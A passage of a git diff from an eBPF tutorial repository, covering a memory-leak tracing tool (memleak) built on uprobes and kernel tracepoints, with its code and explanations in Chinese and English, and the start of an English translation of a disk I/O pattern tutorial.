pvalloc_enter); + ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); + + // added in C11 + ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); + ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); + + return 0; +} +``` + +在这段代码中,我们看到一个名为`attach_uprobes`的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。 + 
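上面的 `ATTACH_UPROBE_CHECKED`/`ATTACH_URETPROBE_CHECKED` 宏的定义在本文中没有展示。作为参考,下面给出一个简化的示意,说明这类宏大致可以如何基于 libbpf 的 `bpf_program__attach_uprobe_opts` 接口实现。注意这只是一个假设性的草图:其中的 `env.pid` 和 `env.object` 是假定存在的全局配置变量,实际的宏定义请以仓库中的完整源码为准:

```c
// 示意:按符号名在目标二进制(如 libc.so.6)中挂载 uprobe,失败时返回错误。
// ATTACH_UPROBE 与之类似,只是允许挂载失败(不检查返回值)。
// 这里假设 env.pid / env.object 是由命令行参数解析得到的全局配置。
#define ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name)             \
    do {                                                             \
        LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts,                    \
                    .func_name = #sym_name,                          \
                    .retprobe = false);                              \
        skel->links.prog_name = bpf_program__attach_uprobe_opts(     \
            skel->progs.prog_name, env.pid, env.object,              \
            0 /* 偏移量为 0,由 func_name 解析符号 */, &uprobe_opts); \
        if (!skel->links.prog_name)                                  \
            return -errno;                                           \
    } while (false)
```

uretprobe 版本只需把 `.retprobe` 设为 `true`。由于宏展开后直接访问 `skel->progs.<prog_name>` 与 `skel->links.<prog_name>`,同一个宏即可复用于所有被监控的函数。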
+这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。 + +在具体的实现中,我们使用了`ATTACH_UPROBE`和`ATTACH_URETPROBE`两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。 + +这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。 + +这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。 + +注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。 + +完整的源代码: 关于如何安装依赖,请参考: + +## 编译运行 + +```console +$ make +$ sudo ./memleak +using default object: libc.so.6 +using page size: 4096 +tracing kernel: true +Tracing outstanding memory allocs... Hit Ctrl-C to end +[17:17:27] Top 10 stacks with outstanding allocations: +1236992 bytes in 302 allocations from stack + 0 [] + 1 [] + 2 [] + 3 [] + 4 [] + 5 [] + 6 [] +... +``` + +## 总结 + +通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。 + +参考资料: diff --git a/src/16-memleak/README_en.md b/src/16-memleak/README_en.md deleted file mode 100644 index 03d3494..0000000 --- a/src/16-memleak/README_en.md +++ /dev/null @@ -1,447 +0,0 @@ -# eBPF Tutorial by Example 16: Monitoring Memory Leaks - -eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code. - -In this tutorial, we will explore how to write a Memleak program using eBPF to monitor memory leaks in programs. - -## Background and Importance - -Memory leaks are a common problem in computer programming and should not be underestimated. When memory leaks occur, programs gradually consume more memory resources without properly releasing them. Over time, this behavior can lead to a gradual depletion of system memory, significantly reducing the overall performance of the program and system. - -There are many possible causes of memory leaks. It may be due to misconfiguration, such as a program incorrectly configuring dynamic allocation of certain resources. It may also be due to software bugs or incorrect memory management strategies, such as forgetting to release memory that is no longer needed during program execution. Additionally, if an application's memory usage is too high, system performance may significantly decrease due to paging/swapping, or it may even cause the application to be forcibly terminated by the system's OOM killer (Out of Memory Killer). - -### Challenges of Debugging Memory Leaks - -Debugging memory leak issues is a complex and challenging task. This involves detailed examination of the program's configuration, memory allocation, and deallocation, often requiring specialized tools to aid in diagnosis. For example, there are tools that can associate malloc() function calls with specific detection tools, such as Valgrind memcheck, which can simulate the CPU to check all memory accesses, but may greatly slow down the application's execution speed. 
Another option is to use heap analyzers, such as libtcmalloc, which are relatively faster but may still decrease the application's execution speed by more than five times. Additionally, there are tools like gdb that can obtain core dumps of applications and perform post-processing analysis of memory usage. However, these tools often require pausing the application during core dump acquisition or calling the free() function after the application terminates. - -## Role of eBPF - -In this context, the role of eBPF becomes particularly important. eBPF provides an efficient mechanism for monitoring and tracking system-level events, including memory allocation and deallocation. With eBPF, we can trace memory allocation and deallocation requests and collect the call stacks for each allocation. We can then analyze this information to identify call stacks that perform memory allocations but do not perform subsequent deallocations, helping us identify the source of memory leaks. The advantage of this approach is that it can be done in real-time within a running application without pausing the application or performing complex post-processing. - -The `memleak` eBPF tool can trace and match memory allocation and deallocation requests, and collect the call stacks for each allocation. Subsequently, `memleak` can print a summary indicating which call stacks executed allocations but did not perform subsequent deallocations. For example, running the command: - -```console -# ./memleak -p $(pidof allocs) -Attaching to pid 5193, Ctrl+C to quit. -[11:16:33] Top 2 stacks with outstanding allocations: - 80 bytes in 5 allocations from stack - main+0x6d [allocs] - __libc_start_main+0xf0 [libc-2.21.so] - -[11:16:34] Top 2 stacks with outstanding allocations: - 160 bytes in 10 allocations from stack - main+0x6d [allocs] - __libc_start_main+0xf0 [libc-2.21.so] -``` - -After running this command, we can see which stacks the allocated but not deallocated memory came from, as well as the size and quantity of these unreleased memory blocks. - -Over time, it becomes evident that the `main` function of the `allocs` process is leaking memory, 16 bytes at a time. Fortunately, we don't need to inspect each allocation; we have a nice summary that tells us which stack is responsible for the significant leaks. - -## Implementation Principle of memleak - -At a basic level, `memleak` operates by installing monitoring devices on the memory allocation and deallocation paths. It achieves this by inserting eBPF programs into memory allocation and deallocation functions. This means that when these functions are called, `memleak` will record important information, such as the caller's process ID (PID), the allocated memory address, and the size of the allocated memory. When the function for freeing memory is called, `memleak` will delete the corresponding memory allocation record in its internal map. This mechanism allows `memleak` to accurately trace which memory blocks have been allocated but not deallocated.For commonly used memory allocation functions in user space, such as `malloc` and `calloc`, `memleak` uses user space probing (uprobe) technology for monitoring. Uprobe is a dynamic tracing technology for user space applications, which can set breakpoints at any location at runtime without modifying the binary files, thus achieving tracing of specific function calls. - -Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. 
In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -For kernel space memory allocation functions, such as `kmalloc`, `memleak` chooses to use tracepoints for monitoring. Tracepoint is a dynamic tracing technology provided in the Linux kernel, which can dynamically trace specific events in the kernel at runtime without recompiling the kernel or loading kernel modules. - -## Kernel Space eBPF Program Implementation - -## `memleak` Kernel Space eBPF Program Implementation - -The kernel space eBPF program of `memleak` contains some key functions for tracking memory allocation and deallocation. Before delving into these functions, let's first take a look at some data structures defined by `memleak`, which are used in both its kernel space and user space programs. - -```c -#ifndef __MEMLEAK_H -#define __MEMLEAK_H - -#define ALLOCS_MAX_ENTRIES 1000000 -#define COMBINED_ALLOCS_MAX_ENTRIES 10240 - -struct alloc_info { - __u64 size; // Size of allocated memory - __u64 timestamp_ns; // Timestamp when allocation occurs, in nanoseconds - int stack_id; // Call stack ID when allocation occurs -}; - -union combined_alloc_info { - struct { - __u64 total_size : 40; // Total size of all unreleased allocations - __u64 number_of_allocs : 24; // Total number of unreleased allocations - }; - __u64 bits; // Bitwise representation of the structure -}; - -#endif /* __MEMLEAK_H */ -``` - -Here, two main data structures are defined: `alloc_info` and `combined_alloc_info`. - -The `alloc_info` structure contains basic information about a memory allocation, including the allocated memory size `size`, the timestamp `timestamp_ns` when the allocation occurs, and the call stack ID `stack_id` that triggers the allocation. - -The `combined_alloc_info` is a union that contains an embedded structure and a `__u64` type bitwise representation `bits`. The embedded structure has two members: `total_size` and `number_of_allocs`, representing the total size and total count of unreleased allocations, respectively. The numbers 40 and 24 indicate the number of bits occupied by the `total_size` and `number_of_allocs` members, limiting their size. By using this limitation, storage space for the `combined_alloc_info` structure can be saved. Moreover, since `total_size` and `number_of_allocs` share the same `unsigned long long` type variable `bits` for storage, bitwise operations on the member variable `bits` can be used to access and modify `total_size` and `number_of_allocs`, avoiding the complexity of defining additional variables and functions in the program. - -Next, `memleak` defines a series of eBPF maps for storing memory allocation information and analysis results. These maps are defined in the form of `SEC(".maps")`, indicating that they belong to the mapping section of the eBPF program. 
- -```c -const volatile size_t min_size = 0; -const volatile size_t max_size = -1; -const volatile size_t page_size = 4096; -const volatile __u64 sample_rate = 1; -const volatile bool trace_all = false; -const volatile __u64 stack_flags = 0; -const volatile bool wa_missing_free = false; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, pid_t); - __type(value, u64); - __uint(max_entries, 10240); -} sizes SEC(".maps"); - -struct { - //... (continued)__uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); /* address */ - __type(value, struct alloc_info); - __uint(max_entries, ALLOCS_MAX_ENTRIES); -} allocs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); /* stack id */ - __type(value, union combined_alloc_info); - __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES); -} combined_allocs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); - __type(value, u64); - __uint(max_entries, 10240); -} memptrs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_STACK_TRACE); - __type(key, u32); -} stack_traces SEC(".maps"); - -static union combined_alloc_info initial_cinfo; -``` - -The code first defines some configurable parameters, such as `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags`, and `wa_missing_free`, representing the minimum allocation size, maximum allocation size, page size, sample rate, whether to trace all allocations, stack flags, and whether to work in missing free mode. - -Then, five maps are defined: - -1. `sizes`: This is a hash-type map with the key as the process ID and the value as `u64` type, storing the allocation size of each process. -2. `allocs`: This is also a hash-type map with the key as the allocation address and the value as the `alloc_info` structure, storing detailed information about each memory allocation. -3. `combined_allocs`: This is another hash-type map with the key as the stack ID and the value as the `combined_alloc_info` union, storing the total size and count of all unreleased allocations. -4. `memptrs`: This is also a hash-type map with both the key and value as `u64` type, used to pass memory pointers between user space and kernel space. -5. `stack_traces`: This is a stack trace-type map with the key as `u32` type, used to store stack IDs. - -Taking the user-space memory allocation tracing as an example, it mainly hooks memory-related function calls such as `malloc`, `free`, `calloc`, `realloc`, `mmap`, and `munmap` to record data when these functions are called. In user space, `memleak` mainly uses uprobes technology for hooking. - -Each function call is divided into "enter" and "exit" parts. The "enter" part records the function call parameters, such as the size of the allocation or the address being freed. The "exit" part is mainly used to obtain the return value of the function, such as the memory address obtained from the allocation. - -Here, `gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` are functions that implement the recording behavior, and they are used to record relevant information when allocation starts, allocation ends, and freeing starts, respectively. 
- -The function prototype is as follows: - -```c -SEC("uprobe") -int BPF_KPROBE(malloc_enter, size_t size) -{ - // Record relevant information when allocation starts - return gen_alloc_enter(size); -} - -SEC("uretprobe") -int BPF_KRETPROBE(malloc_exit) -{ - // Record relevant information when allocation ends - return gen_alloc_exit(ctx); -} - -SEC("uprobe") -int BPF_KPROBE(free_enter, void *address) -{ - // Record relevant information when freeing starts - return gen_free_enter(address); -} -``` - -`malloc_enter` and `free_enter` are probes mounted at the entry points of the `malloc` and `free` functions, respectively, to record data during function calls. `malloc_exit` is a probe mounted at the return point of the `malloc` function to record the return value of the function. - -These functions are declared using the `BPF_KPROBE` and `BPF_KRETPROBE` macros, which are used to declare kprobes (kernel probes) and kretprobes (kernel return probes), respectively. Specifically, kprobe is triggered during function calls, while kretprobe is triggered during function returns. - -The `gen_alloc_enter` function is called at the beginning of a memory allocation request. This function is mainly responsible for collecting some basic information when the function that allocates memory is called. Now, let's take a deep dive into the implementation of this function. - -```c -static int gen_alloc_enter(size_t size) -{ - if (size < min_size || size > max_size) - return 0; - - if (sample_rate > 1) { - if (bpf_ktime_get_ns() % sample_rate != 0) - return 0; - } - - const pid_t pid = bpf_get_current_pid_tgid() >> 32; - bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY); - - if (trace_all) - bpf_printk("alloc entered, size = %lu\n", size); - - return 0; -} - -SEC("uprobe") -int BPF_KPROBE(malloc_enter, size_t size) -{ - return gen_alloc_enter(size); -} -``` - -First, the `gen_alloc_enter` function takes a `size` parameter that represents the size of the requested memory allocation. If this value is not between `min_size` and `max_size`, the function will return directly without performing any further operations. This allows the tool to focus on tracing memory allocation requests within a specific range and filter out uninteresting allocation requests. - -Next, the function checks the sampling rate `sample_rate`. If `sample_rate` is greater than 1, it means that we don't need to trace all memory allocation requests, but rather trace them periodically. Here, `bpf_ktime_get_ns` is used to get the current timestamp, and the modulus operation is used to determine whether to trace the current memory allocation request. This is a common sampling technique used to reduce performance overhead while providing a representative sample for analysis. - -Then, the function uses the `bpf_get_current_pid_tgid` function to retrieve the current process's PID. Note that the PID here is actually a combination of the process ID and thread ID, and we shift it right by 32 bits to get the actual process ID. - -The function then updates the `sizes` map, which uses the process ID as the key and the requested memory allocation size as the value. `BPF_ANY` indicates that if the key already exists, the value will be updated; otherwise, a new entry will be created. - -Finally, if the `trace_all` flag is enabled, the function will print a message indicating that a memory allocation has occurred. 
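One detail worth spelling out is the layout of the value returned by `bpf_get_current_pid_tgid`, since the right shift above depends on it. The helper can only be called from BPF programs, but the bit manipulation itself can be illustrated in isolation (a small sketch added for clarity, not part of the original tool):

```c
/* bpf_get_current_pid_tgid() packs two identifiers into a single u64:
 *   upper 32 bits: tgid - the thread-group ID, which is what user space
 *                  normally calls the "process ID"
 *   lower 32 bits: the kernel task ID, i.e. the thread ID
 */
u64 id = bpf_get_current_pid_tgid();
pid_t pid = id >> 32;  /* process ID, used as the key of the sizes map */
pid_t tid = (u32)id;   /* thread ID, not needed here */
```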
- -The `BPF_KPROBE` macro is used to intercept the execution of the `malloc` function with a BPF uprobe when the `malloc_enter` function is called, and it records the memory allocation size using `gen_alloc_enter`. -We have just analyzed the entry function `gen_alloc_enter` of memory allocation, now let's focus on the exit part of this process. Specifically, we will discuss the `gen_alloc_exit2` function and how to obtain the returned memory address from the memory allocation call. - -```c -static int gen_alloc_exit2(void *ctx, u64 address) -{ - const pid_t pid = bpf_get_current_pid_tgid() >> 32; - struct alloc_info info; - - const u64* size = bpf_map_lookup_elem(&sizes, &pid); - if (!size) - return 0; // missed alloc entry - - __builtin_memset(&info, 0, sizeof(info)); - - info.size = *size;bpf_map_delete_elem(&sizes, &pid); - - if (address != 0) { - info.timestamp_ns = bpf_ktime_get_ns(); - - info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags); - - bpf_map_update_elem(&allocs, &address, &info, BPF_ANY); - - update_statistics_add(info.stack_id, info.size); - } - - if (trace_all) { - bpf_printk("alloc exited, size = %lu, result = %lx\n", - info.size, address); - } - - return 0; -} - -static int gen_alloc_exit(struct pt_regs *ctx) -{ - return gen_alloc_exit2(ctx, PT_REGS_RC(ctx)); -} - -SEC("uretprobe") -int BPF_KRETPROBE(malloc_exit) -{ - return gen_alloc_exit(ctx); -} -``` - -`gen_alloc_exit2` function is called when the memory allocation operation is completed. This function takes two parameters, one is the context `ctx` and the other is the memory address returned by the memory allocation function `address`. - -First, it obtains the PID (Process ID) of the current thread and uses it as a key to look up the corresponding memory allocation size in the `sizes` map. If not found (i.e., no entry for the memory allocation operation), the function simply returns. - -Then, it clears the content of the `info` structure and sets its `size` field to the memory allocation size found in the map. It also removes the corresponding element from the `sizes` map because the memory allocation operation has completed and this information is no longer needed. - -Next, if `address` is not zero (indicating a successful memory allocation operation), the function further collects some additional information. First, it obtains the current timestamp as the completion time of the memory allocation and fetches the current stack trace. These pieces of information are stored in the `info` structure and subsequently updated in the `allocs` map. - -Finally, the function calls `update_statistics_add` to update the statistics data and, if tracing of all memory allocation operations is enabled, it prints some information about the memory allocation operation. - -Note that, `gen_alloc_exit` is a wrapper for `gen_alloc_exit2`, which passes `PT_REGS_RC(ctx)` as the `address` parameter to `gen_alloc_exit2`. - -In our discussion, we just mentioned that `update_statistics_add` function is called in the `gen_alloc_exit2` function to update the statistics data for memory allocations. Now let's take a closer look at the implementation of this function. 
- -```c -static void update_statistics_add(u64 stack_id, u64 sz) -{ - union combined_alloc_info *existing_cinfo; - - existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo); - if (!existing_cinfo) - return; - - const union combined_alloc_info incremental_cinfo = { - .total_size = sz, - .number_of_allocs = 1 - }; - - __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits); -} -``` - -The `update_statistics_add` function takes two parameters: the current stack ID `stack_id` and the size of the memory allocation `sz`. These two parameters are collected in the memory allocation event and used to update the statistics data for memory allocations.First, the function tries to find the element with the current stack ID as the key in the `combined_allocs` map. If it is not found, a new element is initialized with `initial_cinfo` (which is a default `combined_alloc_info` structure with all fields set to zero). - -Next, the function creates an `incremental_cinfo` and sets its `total_size` to the current memory allocation size and `number_of_allocs` to 1. This is because each call to the `update_statistics_add` function represents a new memory allocation event, and the size of this event's memory allocation is `sz`. - -Finally, the function atomically adds the value of `incremental_cinfo` to `existing_cinfo` using the `__sync_fetch_and_add` function. Note that this step is thread-safe, so even if multiple threads call the `update_statistics_add` function concurrently, each memory allocation event will be correctly recorded in the statistics. - -In summary, the `update_statistics_add` function implements the logic for updating memory allocation statistics. By maintaining the total amount and number of memory allocations for each stack ID, we can gain insight into the memory allocation behavior of the program. - -In our process of tracking memory allocation statistics, we not only need to count memory allocations but also consider memory releases. In the above code, we define a function called `update_statistics_del` that updates the statistics when memory is freed. The function `gen_free_enter` is executed when the process calls the `free` function. - -The `update_statistics_del` function takes the stack ID and the size of the memory block to be freed as parameters. First, the function uses the current stack ID as the key to look up the corresponding `combined_alloc_info` structure in the `combined_allocs` map. If it is not found, an error message is output and the function returns. If it is found, a `decremental_cinfo` `combined_alloc_info` structure is constructed with its `total_size` set to the size of the memory to be freed and `number_of_allocs` set to 1. Then the `__sync_fetch_and_sub` function is used to atomically subtract the value of `decremental_cinfo` from `existing_cinfo`. Note that the `number_of_allocs` here is negative, indicating a decrease in memory allocation. - -The `gen_free_enter` function takes the address to be freed as a parameter. It first converts the address to an unsigned 64-bit integer (`u64`). Then it looks up the `alloc_info` structure in the `allocs` map using the address as the key. If it is not found, the function returns 0. If it is found, the `alloc_info` structure is deleted from the `allocs` map, and the `update_statistics_del` function is called with the stack ID and size from `info`. If `trace_all` is true, an information message is output. 
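The paragraph above describes `update_statistics_del` without showing it; for reference, here is the function as it appears in the kernel-side source included earlier in this patch, with comments added:

```c
static void update_statistics_del(u64 stack_id, u64 sz)
{
    union combined_alloc_info *existing_cinfo;

    /* the stack must already have an entry created by update_statistics_add */
    existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
    if (!existing_cinfo) {
        bpf_printk("failed to lookup combined allocs\n");
        return;
    }

    /* one allocation of sz bytes is being released for this stack */
    const union combined_alloc_info decremental_cinfo = {
        .total_size = sz,
        .number_of_allocs = 1
    };

    __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
}
```

Subtracting `decremental_cinfo.bits` decrements both bit-fields in a single atomic operation, mirroring the single atomic add performed in `update_statistics_add`.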
- -```c -int BPF_KPROBE(free_enter, void *address) -{ - return gen_free_enter(address); -} -``` - -Next, let's look at the `gen_free_enter` function. It takes an address as a parameter, which is the result of memory allocation, i.e., the starting address of the memory to be freed. The function first uses this address as a key to search for the corresponding `alloc_info` structure in the `allocs` map. If it is not found, it simply returns because it means that this address has not been allocated. If it is found, the element is deleted, and the `update_statistics_del` function is called to update the statistics data. Finally, if global tracking is enabled, a message is also output, including this address and its size. - -While tracking and profiling memory allocation, we also need to track kernel-mode memory allocation and deallocation. In the Linux kernel, the `kmem_cache_alloc` function and the `kfree` function are used for kernel-mode memory allocation and deallocation, respectively. - -```c -SEC("tracepoint/kmem/kfree") -int memleak__kfree(void *ctx) -{ - const void *ptr; - - if (has_kfree()) { - struct trace_event_raw_kfree___x *args = ctx; - ptr = BPF_CORE_READ(args, ptr); - } else { - struct trace_event_raw_kmem_free___x *args = ctx; - ptr = BPF_CORE_READ(args, ptr); - } - - return gen_free_enter(ptr); -} -``` - -The above code snippet defines a function `memleak__kfree`. This is a BPF program that will be executed when the `kfree` function is called in the kernel. First, the function checks if `kfree` exists. If it does, it reads the argument passed to the `kfree` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Otherwise, it reads the argument passed to the `kmem_free` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Then, the function calls the previously defined `gen_free_enter` function to handle the release of this memory block. - -```c -SEC("tracepoint/kmem/kmem_cache_alloc") -int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) -{ - if (wa_missing_free) - gen_free_enter(ctx->ptr); - - gen_alloc_enter(ctx->bytes_alloc); - - return gen_alloc_exit2(ctx, (u64)(ctx->ptr)); -} -``` - -This code snippet defines a function `memleak__kmem_cache_alloc`. This is also a BPF program that will be executed when the `kmem_cache_alloc` function is called in the kernel. If the `wa_missing_free` flag is set, it calls the `gen_free_enter` function to handle possible missed release operations. Then, the function calls the `gen_alloc_enter` function to handle memory allocation and finally calls the `gen_alloc_exit2` function to record the allocation result. - -Both of these BPF programs use the `SEC` macro to define the corresponding tracepoints, so that they can be executed when the corresponding kernel functions are called. In the Linux kernel, a tracepoint is a static hook that can be inserted into the kernel to collect runtime kernel information. It is very useful for debugging and performance analysis. - -In the process of understanding this code, pay attention to the use of the `BPF_CORE_READ` macro. This macro is used to read kernel data in BPF programs. In BPF programs, we cannot directly access kernel memory and need to use such macros to safely read data. - -### User-Space Program - -After understanding the BPF kernel part, let's switch to the user-space program. The user-space program works closely with the BPF kernel program. 
It is responsible for loading BPF programs into the kernel, setting up and managing BPF maps, and handling data collected from BPF programs. The user-space program is longer, but here we can briefly refer to its mount point. - -```c -int attach_uprobes(struct memleak_bpf *skel) -{ - ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); - ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); - ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); - ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); - - ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); - ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); - - ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); - ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); - - ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); - ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); - - ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); - ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); - - ATTACH_UPROBE_CHECKED(skel, free, free_enter); - ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); - - // the following probes are intentionally allowed to fail attachment - - // deprecated in libc.so bionic - ATTACH_UPROBE(skel, valloc, valloc_enter); - ATTACH_URETPROBE(skel, valloc, valloc_exit); - - // deprecated in libc.so bionic - ATTACH_UPROBE(skel, pvalloc, pvalloc_enter); - ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); - - // added in C11 - ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); - ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); - - return 0; -} -``` - -In this code snippet, we see a function called `attach_uprobes` that mounts uprobes (user space probes) onto memory allocation and deallocation functions. In Linux, uprobes are a kernel mechanism that allows setting breakpoints at arbitrary locations in user space programs, enabling precise observation and control over the behavior of user space programs. - -Here, each memory-related function is traced using two uprobes: one at the entry (enter) of the function and one at the exit. Thus, every time these functions are called or return, a uprobes event is triggered, which in turn triggers the corresponding BPF program. - -In the actual implementation, we use two macros, `ATTACH_UPROBE` and `ATTACH_URETPROBE`, to attach uprobes and uretprobes (function return probes), respectively. Each macro takes three arguments: the skeleton of the BPF program (skel), the name of the function to monitor, and the name of the BPF program to trigger. - -These mount points include common memory allocation functions such as malloc, calloc, realloc, mmap, posix_memalign, memalign, free, and their corresponding exit points. Additionally, we also observe some possible allocation functions such as valloc, pvalloc, aligned_alloc, although they may not always exist. - -The goal of these mount points is to capture all possible memory allocation and deallocation events, allowing our memory leak detection tool to obtain as comprehensive data as possible. This approach enables us to track not only memory allocation and deallocation but also their contextual information such as call stacks and invocation counts, helping us to pinpoint and fix memory leak issues. - -Note that some memory allocation functions may not exist or may have been deprecated, such as valloc and pvalloc. Thus, their attachment may fail. In such cases, we allow for attachment failures, which do not prevent the program from executing. 
This is because we are more focused on mainstream and commonly used memory allocation functions, while these deprecated functions are often used less frequently in practical applications. - -Complete source code: - -Reference: - -## Compile and Run - -```console -$ make -$ sudo ./memleak -using default object: libc.so.6 -using page size: 4096 -tracing kernel: true -Tracing outstanding memory allocs... Hit Ctrl-C to end -[17:17:27] Top 10 stacks with outstanding allocations: -1236992 bytes in 302 allocations from stack - 0 [] - 1 [] - 2 [] - 3 [] - 4 [] - 5 [] - 6 [] -... -``` - -## Summary - -Through this eBPF introductory tutorial, you have learned how to write a Memleak eBPF monitoring program to monitor memory leaks in real time. You have also learned about the application of eBPF in memory monitoring, how to write eBPF programs using the BPF API, create and use eBPF maps, and how to use eBPF tools to monitor and analyze memory leak issues. We have provided a detailed example to help you understand the execution flow and principles of eBPF code. - -You can visit our tutorial code repository at or website for more examples and complete tutorials. - -> The original link of this article: diff --git a/src/17-biopattern/README.md b/src/17-biopattern/README.md index e07e976..2a7cb9c 100644 --- a/src/17-biopattern/README.md +++ b/src/17-biopattern/README.md @@ -1,41 +1,41 @@ -# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O +# eBPF Tutorial by Example 17: Count Random/Sequential Disk I/O -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。 +eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programmes in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation. -在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。 +In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications. -## 随机/顺序磁盘 I/O +## Random/Sequential Disk I/O -随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。 +As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O. -1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。 +1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments. -2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。 +2. 
